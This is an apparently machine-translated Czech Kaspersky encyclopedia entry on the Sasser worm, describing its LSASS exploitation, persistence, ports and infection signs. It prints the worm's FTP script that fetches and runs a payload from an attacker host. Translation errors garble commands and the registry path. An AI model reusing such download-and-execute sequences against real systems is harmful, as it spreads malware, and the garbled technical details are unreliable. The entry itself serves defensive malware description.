Tato služba může obsahovat Google překlady. Společnost Google odmítá veškerou odpovědnost za překlad, doslovný i předpokládaný, včetně veškerých záruk aktuálnosti, spolehlivosti a veškerých záruk předpokládané zobchodovatelnosti, vhodnosti pro daný účel a neporušení práv.

Web Kaspersky Lab byl přeložen překládacím softwarem založeným na Google Translate. Bylo vynaloženo přiměřené úsilí, aby byl zajištěn přesný překlad, avšak žádný automatický překlad není dokonalý a není určen k nahrazení lidských překladatelů. Překlady jsou poskytovány jako služba uživatelům webových stránek a jsou poskytovány „tak jak jsou“. Neexistuje žádná záruka jakéhokoliv druhu, na vyjádřený nebo předpokládaný překlad, na přesnost nebo správnost překladů. Některý obsah (například obrázky, videa, Flash atd.) Nemusí být přesně přeložen z důvodu omezení překladového softwaru.

Net-Worm.Win32.Sasser

Detekováno 05/13/2004
Třída Net-Worm
Platfoma Win32
Popis

Sasser je internetový červ, který využívá chybu zabezpečení systému MS Windows LSASS popsané v bulletinu zabezpečení MS04-011 společnosti Microsoft .

Společnost Microsoft vydala patch této zranitelnosti 13. dubna 2004, zatímco Sasser.a byla poprvé detekována 30. dubna 2004.

Sasser funguje velmi podobným způsobem jako Lovesan, kromě toho, že Lovesan využíval zranitelnost v službě PRC DCOM, nikoliv službu LSASS.

Systém Sasser ovlivňuje počítače se systémy Windows 2000, Windows XP a Windows Server 2003. Sasser funguje na všech ostatních verzích systému Windows, ale nemůže je napadnout napadením prostřednictvím této chyby zabezpečení.

Sasser je napsán v C / C ++ pomocí kompilátoru Visual C. Šnek je asi 15 KL a je zabalen PECompact2.

Známky infekce

  • soubor 'avserve.exe' v adresáři Windows.
  • Chybová zpráva o selhání služby LSASS obvykle způsobuje také restartování systému.

Propagace

Po spuštění se Sasser zkopíruje do kořenového adresáře systému Windows pod názvem avserve.exe a registruje tento soubor v registru autorun registru systému:

 [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]



 "avserve.exe" = "% WINDIR% avserve.exe" 

Společnost Sasser vytvoří v paměti RAM jedinečný identifikátor "Jobaka31", aby si v případě budoucích pokusů o infekci našel kopie sebe sama.

Společnost Sasser spouští server FTP na portu TCP 5554 a poté spouští 128 rutin pro šíření. Během tohoto procesu se červ pokusí spustit proces AbortSystemShutdown, aby zakázal restart systému.

Sasser iniciuje skenování adres IP, aby identifikoval adresy obětí a pošle požadavek na port TCP 445. Pokud nějaké počítače reagují, Sasser využívá chybu zabezpečení LSASS k spuštění příkazového shellu "cmd.exe" na portu TCP 9996. Konečně Sasser, povolují infikovanému počítači stáhnout a spustit hlavní komponentu červ pod názvem "N_up.exe", kde "N" je náhodné číslo:

 echo vypnuto



echo open [útočná adresa počítače] 5554 >> cmd.ftp



echo anonymní >> cmd.ftp



echo uživatele



echo bin >> cmd.ftp



echo get [náhodné číslo] _up.exe >> cmd.ftp



echo bye >> cmd.ftp



echo na



ftp -s: cmd.ftp



[náhodné číslo] _up.exe



echo vypnuto



del cmd.ftp



echo na 

V důsledku toho může být jeden počítač napaden vícekrát a obsahuje vícenásobné kopie červa s názvy vzorků, jako například:

 23101_up.exe



5409_up.exe 

a tak dále.

jiný

Po infekci zařízení poškozeného generuje chybovou zprávu o selhání služby LSASS, načež se může pokusit restartovat.

Sasser vytvoří soubor 'win.log' v kořenovém adresáři jednotky C, kde červa zaznamená IP adresy všech napadených počítačů.


Odkaz na originál